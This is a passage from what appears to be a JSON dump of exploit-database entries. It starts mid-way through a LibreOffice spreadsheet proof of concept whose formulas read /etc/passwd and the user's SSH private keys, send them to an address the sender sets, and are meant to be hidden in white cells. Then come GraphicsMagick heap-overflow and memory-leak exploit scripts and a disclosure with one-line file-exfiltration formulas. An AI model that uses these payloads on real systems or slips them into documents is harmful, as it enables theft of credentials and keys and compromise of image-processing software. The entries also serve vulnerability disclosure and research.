table:style-name=\"ta1\">\r\n <table:table-column table:style-name=\"co1\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co2\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co3\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co4\" table:number-columns-repeated=\"2\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co5\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co4\" table:number-columns-repeated=\"2\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co6\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>Proof-of-concept: send private keys (this cells of course must be moved and set color to white)</text:p>\r\n </table:table-cell>\r\n <table:table-cell 
table:number-columns-repeated=\"8\"/>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell table:number-columns-repeated=\"9\"/>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro2\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>Current user:</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce1\" table:formula=\"of:=\"/home/\" & MID(COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\"); FIND(\"USER=\"; COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\")) + LEN(\"USER=\"); SEARCH(CHAR(0); COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\"); FIND(\"USER=\"; COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\")))-FIND(\"USER=\"; COM.MICROSOFT.WEBSERVICE(\"/proc/self/environ\"))-LEN(\"USER=\")) & \"/\"\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce2\" table:formula=\"of:=FIND(\":\"; [.F3]; [.E3])\" office:value-type=\"float\" office:value=\"689\" calcext:value-type=\"float\">\r\n <text:p>689</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce2\" table:formula=\"of:=FIND(\"/home\"; [.F3]; FIND(\":x:1000:1000:\"; [.F3]))\" office:value-type=\"float\" office:value=\"676\" calcext:value-type=\"float\">\r\n <text:p>676</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce2\" table:formula=\"of:=COM.MICROSOFT.WEBSERVICE(\"/etc/passwd\")\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell/>\r\n <table:table-cell table:style-name=\"ce5\" office:value-type=\"string\" calcext:value-type=\"string\"><text:p>(change this)</text:p><text:p>Address:</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce5\" office:value-type=\"string\" 
calcext:value-type=\"string\">\r\n <text:p>http://localhost:8080</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro3\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>List of private keys:</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:style-name=\"ce1\"/>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=SUBSTITUTE(COM.MICROSOFT.WEBSERVICE([.C3] & \"/.ssh/config\"); \"~\"; [.C3])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>Send:</text:p>\r\n </table:table-cell>\r\n <table:table-cell/>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"string\" calcext:value-type=\"string\">\r\n <text:p>0 (default path)</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.C3] & \"/.ssh/id_rsa\"\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"5\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C5]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"1\" calcext:value-type=\"float\">\r\n <text:p>1</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E6]; [.D6]-[.E6])\" office:value-type=\"string\" 
office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F6])\" office:value-type=\"float\" office:value=\"132\" calcext:value-type=\"float\">\r\n <text:p>132</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F6]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"109\" calcext:value-type=\"float\">\r\n <text:p>109</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.F4])\" office:value-type=\"float\" office:value=\"96\" calcext:value-type=\"float\">\r\n <text:p>96</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C6]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"2\" calcext:value-type=\"float\">\r\n <text:p>2</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E7]; [.D7]-[.E7])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F7])\" office:value-type=\"float\" office:value=\"297\" calcext:value-type=\"float\">\r\n <text:p>297</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F7]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"259\" calcext:value-type=\"float\">\r\n <text:p>259</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F6];1))\" 
office:value-type=\"float\" office:value=\"246\" calcext:value-type=\"float\">\r\n <text:p>246</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C7]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"3\" calcext:value-type=\"float\">\r\n <text:p>3</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E8]; [.D8]-[.E8])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F8])\" office:value-type=\"float\" office:value=\"436\" calcext:value-type=\"float\">\r\n <text:p>436</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F8]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"409\" calcext:value-type=\"float\">\r\n <text:p>409</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F7];1))\" office:value-type=\"float\" office:value=\"396\" calcext:value-type=\"float\">\r\n <text:p>396</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C8]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" 
office:value=\"4\" calcext:value-type=\"float\">\r\n <text:p>4</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E9]; [.D9]-[.E9])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F9])\" office:value-type=\"float\" office:value=\"586\" calcext:value-type=\"float\">\r\n <text:p>586</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F9]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"563\" calcext:value-type=\"float\">\r\n <text:p>563</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F8];1))\" office:value-type=\"float\" office:value=\"550\" calcext:value-type=\"float\">\r\n <text:p>550</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C9]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"5\" calcext:value-type=\"float\">\r\n <text:p>5</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E10]; [.D10]-[.E10])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F10])\" office:value-type=\"float\" office:value=\"718\" calcext:value-type=\"float\">\r\n <text:p>718</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F10]+LEN(\"IdentityFile \")\" 
office:value-type=\"float\" office:value=\"695\" calcext:value-type=\"float\">\r\n <text:p>695</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F9];1))\" office:value-type=\"float\" office:value=\"682\" calcext:value-type=\"float\">\r\n <text:p>682</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C10]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"6\" calcext:value-type=\"float\">\r\n <text:p>6</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E11]; [.D11]-[.E11])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F11])\" office:value-type=\"float\" office:value=\"882\" calcext:value-type=\"float\">\r\n <text:p>882</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F11]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"860\" calcext:value-type=\"float\">\r\n <text:p>860</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F10];1))\" office:value-type=\"float\" office:value=\"847\" calcext:value-type=\"float\">\r\n <text:p>847</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C11]))\" office:value-type=\"string\" office:string-value=\"\" 
calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"7\" calcext:value-type=\"float\">\r\n <text:p>7</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E12]; [.D12]-[.E12])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F12])\" office:value-type=\"float\" office:value=\"1267\" calcext:value-type=\"float\">\r\n <text:p>1267</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F12]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"1240\" calcext:value-type=\"float\">\r\n <text:p>1240</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F11];1))\" office:value-type=\"float\" office:value=\"1227\" calcext:value-type=\"float\">\r\n <text:p>1227</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C12]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"8\" calcext:value-type=\"float\">\r\n <text:p>8</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E13]; [.D13]-[.E13])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); 
[.$F$4]; [.F13])\" office:value-type=\"float\" office:value=\"1408\" calcext:value-type=\"float\">\r\n <text:p>1408</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F13]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"1383\" calcext:value-type=\"float\">\r\n <text:p>1383</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F12];1))\" office:value-type=\"float\" office:value=\"1370\" calcext:value-type=\"float\">\r\n <text:p>1370</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C13]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"9\" calcext:value-type=\"float\">\r\n <text:p>9</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E14]; [.D14]-[.E14])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F14])\" office:value-type=\"float\" office:value=\"0\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F14]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"0\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F13];1))\" office:value-type=\"float\" office:value=\"0\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n 
<table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C14]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n </table:table>\r\n <table:named-expressions/>\r\n </office:spreadsheet>\r\n </office:body>\r\n</office:document>\r\n```", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44022/"}, {"lastseen": "2017-11-03T20:31:35", "bulletinFamily": "exploit", "description": "GraphicsMagick - Memory Disclosure / Heap Overflow. CVE-2017-16352,CVE-2017-16353. Dos exploit for Multiple platform", "modified": "2017-11-03T00:00:00", "published": "2017-11-03T00:00:00", "id": "EDB-ID:43111", "href": "https://www.exploit-db.com/exploits/43111/", "type": "exploitdb", "title": "GraphicsMagick - Memory Disclosure / Heap Overflow", "sourceData": "'''Vulnerabilities summary\r\nThe following advisory describes two (2) vulnerabilities found in GraphicsMagick.\r\n\r\nGraphicsMagick is \u201cThe swiss army knife of image processing. Comprised of 267K physical lines (according to David A. 
Wheeler\u2019s SLOCCount) of source code in the base package (or 1,225K including 3rd party libraries) it provides a robust and efficient collection of tools and libraries which support reading, writing, and manipulating an image in over 88 major formats including important formats like DPX, GIF, JPEG, JPEG-2000, PNG, PDF, PNM, and TIFF.\u201d\r\n\r\nThe vulnerabilities found are:\r\n\r\nMemory Information Disclosure\r\nHeap Overflow\r\nCredit\r\nAn independent security researchers, Jeremy Heng (@nn_amon) and Terry Chia (Ayrx), has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program\r\n\r\nVendor response\r\nThe vendor has released patches to address these vulnerabilities (15237:e4e1c2a581d8 and 15238:7292230dd18).\r\n\r\nFor more details: ftp://ftp.graphicsmagick.org/pub/GraphicsMagick/snapshots/ChangeLog.txt\r\n\r\n\r\nVulnerabilities details\r\n\r\nMemory Information Disclosure\r\nGraphicsMagick is vulnerable to a memory information disclosure vulnerability found in DescribeImage function of the magick/describe.c file.\r\n\r\nThe portion of the code containing the vulnerability responsible of printing the IPTC Profile information contained in the image.\r\n\r\nThis vulnerability can be triggered with a specially crafted MIFF file.\r\n\r\nThe code which triggers the vulnerable code path is:\r\n\r\n63 MagickExport MagickPassFail DescribeImage(Image *image,FILE *file,\r\n64 const MagickBool verbose)\r\n65 {\r\n...\r\n660 for (i=0; i < profile_length; )\r\n661 {\r\n662 if (profile[i] != 0x1c)\r\n663 {\r\n664 i++;\r\n665 continue;\r\n666 }\r\n667 i++; /* skip file separator */\r\n668 i++; /* skip record number */\r\n...\r\n725 i++;\r\n726 (void) fprintf(file,\" %.1024s:\\n\",tag);\r\n727 length=profile[i++] << 8;\r\n728 length|=profile[i++];\r\n729 text=MagickAllocateMemory(char *,length+1);\r\n730 if (text != (char *) NULL)\r\n731 {\r\n732 char\r\n733 **textlist;\r\n734\r\n735 register unsigned long\r\n736 j;\r\n737\r\n738 
(void) strncpy(text,(char *) profile+i,length);\r\n739 text[length]='\\0';\r\n740 textlist=StringToList(text);\r\n741 if (textlist != (char **) NULL)\r\n742 {\r\n743 for (j=0; textlist[j] != (char *) NULL; j++)\r\n744 {\r\n745 (void) fprintf(file,\" %s\\n\",textlist[j]);\r\n...\r\n752 i+=length;\r\n753 }\r\n\r\n\r\nThe value in profile_length variable is set in the following field in the MIFF header: profile-iptc=8\r\n\r\nThere is an out-of-bounds buffer dereference whenever profile[i] is accessed because the increments of i is never checked.\r\n\r\nIf we break on line 738 of describe.c, we can explore what is present on the heap during the strncpy operation.\r\n\r\n\r\ngef\u27a4 x/2xg profile\r\n0x8be210: 0x08000a001c414141 0x00007ffff690fba8\r\n\r\n\r\nThe 8 bytes 0x08000a001c414141 is the profile payload present in the specially crafted MIFF file.\r\n\r\n\r\n41 41 41 - padding\r\n1C - sentinel check in line 662\r\n00 - padding\r\n0A - \"Priority\" tag\r\n08 00 - 8 in big endian, the length\r\n\r\n\r\nIf we examine the value 0x00007ffff690fba8 adjacent to the payload, it becomes apparent that it is an address within the main_arena struct in libc.\r\n\r\n\r\ngef\u27a4 x/xw 0x00007ffff690fba8\r\n0x7ffff690fba8 <main_arena+136>: 0x008cdc40\r\ngef\u27a4 vmmap libc\r\nStart End Offset Perm Path\r\n0x00007ffff654b000 0x00007ffff670b000 0x0000000000000000 r-x\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff670b000 0x00007ffff690b000 0x00000000001c0000 ---\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff690b000 0x00007ffff690f000 0x00000000001c0000 r--\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff690f000 0x00007ffff6911000 0x00000000001c4000 rw-\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n\r\nNow we can calculate the offset to libc base \u2013 0x3c4b98\r\n\r\nProof of Concept\r\n\r\n$ python miff/readexploit.py\r\n[+] Starting local process \u2018/usr/bin/gm\u2019: pid 20019\r\n[+] Receiving all data: Done (1.27KB)\r\n[*] Process \u2018/usr/bin/gm\u2019 
stopped with exit code 0 (pid 20019)\r\n[*] Main Arena Leak: 0x7f72948adb98\r\n[*] libc Base: 0x7f72944e9000\r\n\r\n#!/usr/bin/python\r\n# GraphicsMagick IPTC Profile libc Leak\r\n \r\nfrom pwn import *\r\n \r\ndirectory = \"DIR\"\r\npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' +\r\n 'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\nprofil' +\r\n 'e-iptc=',\r\n '\\n\\x0c\\n:\\x1a',\r\n '\\n\\x00',\r\n '\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n')\r\noutput = \"readexploit.miff\"\r\nlength = 8\r\n \r\n#libc_main_arena_entry_offset = 0x3c4ba8\r\nlibc_main_arena_entry_offset = 0x3c4b98\r\n \r\ndef main():\r\n data = \"AAA\" + \"\\x1c\" + \"\\x00\" + chr(10) + p16(0x8, endian=\"big\")\r\n header = partitions[0] + str(length) + partitions[1]\r\n payload = header + directory + partitions[2] + data + partitions[3]\r\n file(output, \"w\").write(payload)\r\n \r\n p = process(executable=\"gm\", argv=[\"identify\", \"-verbose\", output])\r\n output_leak = p.recvall()\r\n priority_offset = output_leak.index(\"Priority:\") + 12\r\n montage_offset = output_leak.index(\"Montage:\") - 3\r\n leak = output_leak[priority_offset:montage_offset]\r\n if \"0x00000000\" in leak:\r\n log.info(\"Unlucky run. Value corrupted by StringToList\")\r\n exit()\r\n main_arena_leak = u64(leak.ljust(8, \"\\x00\"))\r\n log.info(\"Main Arena Leak: 0x%x\" % main_arena_leak)\r\n libc_base = main_arena_leak - libc_main_arena_entry_offset\r\n log.info(\"libc Base: 0x%x\" % libc_base)\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n \r\nHeap Overflow\r\nGraphicsMagick is vulnerable to a heap overflow vulnerability found in DescribeImage() function of the magick/describe.c file.\r\n\r\nThe call to strncpy on line 855 does not limit the size to be copied to the size of the buffer copied to. 
Instead, the size is calculated by searching for a newline or a null byte in the directory name.\r\n\r\n844 /*\r\n845 Display visual image directory.\r\n846 */\r\n847 image_info=CloneImageInfo((ImageInfo *) NULL);\r\n848 (void) CloneString(&image_info->size,\"64x64\");\r\n849 (void) fprintf(file,\" Directory:\\n\");\r\n850 for (p=image->directory; *p != '\\0'; p++)\r\n851 {\r\n852 q=p;\r\n853 while ((*q != '\\n') && (*q != '\\0'))\r\n854 q++;\r\n855 (void) strncpy(image_info->filename,p,q-p);\r\n856 image_info->filename[q-p]='\\0';\r\n857 p=q;\r\n...\r\n880 }\r\n881 DestroyImageInfo(image_info);\r\n\r\nSince the field filename in the ImageInfo struct has the static size of 2053, the heap can be corrupted by forging an overly long directory name.\r\n\r\n\r\ntype = struct _ImageInfo {\r\n...\r\n FILE *file;\r\n char magick[2053];\r\n char filename[2053];\r\n _CacheInfoPtr_ cache;\r\n void *definitions;\r\n Image *attributes;\r\n unsigned int ping;\r\n PreviewType preview_type;\r\n unsigned int affirm;\r\n _BlobInfoPtr_ blob;\r\n size_t length;\r\n char unique[2053];\r\n char zero[2053];\r\n unsigned long signature;\r\n}\r\n\r\nOne possible way to trigger the vulnerability is to run the identify command on a specially crafted MIFF format file with the verbose flag.\r\n\r\nProof of Concept\r\nThe following proof of concept script will generate a specially crafted MIFF file exploit.miff.\r\n'''\r\n\r\n#!/usr/bin/python\r\n \r\nfrom pwn import *\r\n \r\npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' +\r\n 'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\n\\x0c\\n' +\r\n ':\\x1a',\r\n '\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n')\r\noutput = \"exploit.miff\"\r\n \r\ndef main():\r\n payload = \"A\"*10000\r\n payload = partitions[0] + payload + partitions[1]\r\n file(output, \"w\").write(payload)\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n''' \r\nRunning the GraphicsMagick gm utility with the arguments identify -verbose in 
GDB and breaking after the vulnerable strncpy call, and examining the corrupted ImageInfo object demonstrates that the heap corruption was successful.\r\n\r\n\r\ngef\u27a4 r identify -verbose exploit.miff\r\n...\r\ngef\u27a4 br describe.c:856\r\nBreakpoint 1 at 0x4571df: file magick/describe.c, line 856.\r\n...\r\ngef\u27a4 p *image_info\r\n$3 = {\r\n...\r\n compression = UndefinedCompression,\r\n file = 0x0,\r\n magick = '\\000' <repeats 2052 times>,\r\n filename = 'A' <repeats 2053 times>,\r\n cache = 0x4141414141414141,\r\n definitions = 0x4141414141414141,\r\n attributes = 0x4141414141414141,\r\n ping = 0x41414141,\r\n preview_type = 1094795585,\r\n affirm = 0x41414141,\r\n blob = 0x4141414141414141,\r\n length = 0x4141414141414141,\r\n unique = 'A' <repeats 2053 times>,\r\n zero = 'A' <repeats 2053 times>,\r\n signature = 0x4141414141414141\r\n}\r\n'''", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43111/"}], "packetstorm": [{"lastseen": "2018-02-15T00:22:34", "bulletinFamily": "exploit", "description": "", "modified": "2018-02-08T00:00:00", "published": "2018-02-08T00:00:00", "href": "https://packetstormsecurity.com/files/146319/LibreOffice-Arbitrary-File-Disclosure.html", "id": "PACKETSTORM:146319", "type": "packetstorm", "title": "LibreOffice Arbitrary File Disclosure", "sourceData": "`Hello, \n \nAfter I know that the reported vulnerability was already known to developers, \nbut they did not include trivial fix to 6.0, but (as the developer said, I did \nnot check it byself) include to 5.4.5 (it means this is a silent fixed \nvulnerability) with a month lag between updates I think it's more correct to \nfull disclose it. 
\n \nPoC: https://github.com/jollheef/libreoffice-remote-arbitrary-file-disclosure \n \n# Vulnerability description \n \n## First part \n \nLibreOffice supports COM.MICROSOFT.WEBSERVICE function: \n \nhttps://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4 \n \nThe function is required to obtain data by URL, usually used as: \n \n=FILTERXML(WEBSERVICE(\"http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric\");\"number(/weatherdata/forecast/time[2]/temperature/@value)\") \n \nIn original: \n \nFor protocols that are not supported, such as ftp: // or file: //, WEBSERVICE returns the #VALUE! error value. \n \nIn LibreOffice, these restrictions are not implemented. \n \n## Second part \n \nBy default the cells are not updated, but if you specify the cell type like ~error, then the cell will be updated when you open document. \n \n# Exploitation \n \nTo read file you need just: \n \n=WEBSERVICE(\"/etc/passwd\") \n \nThis function can also be used to send a file: \n \n=WEBSERVICE(\"http://localhost:6000/?q=\" & WEBSERVICE(\"/etc/passwd\")) \n \nFor successful operation, you need to send the files of the current user, so you need to retrieve current user home path. \n \n=MID(WEBSERVICE(\"/proc/self/environ\"), FIND(\"USER=\", WEBSERVICE(\"/proc/self/environ\")) + 5, SEARCH(CHAR(0), WEBSERVICE(\"/proc/self/environ\"), 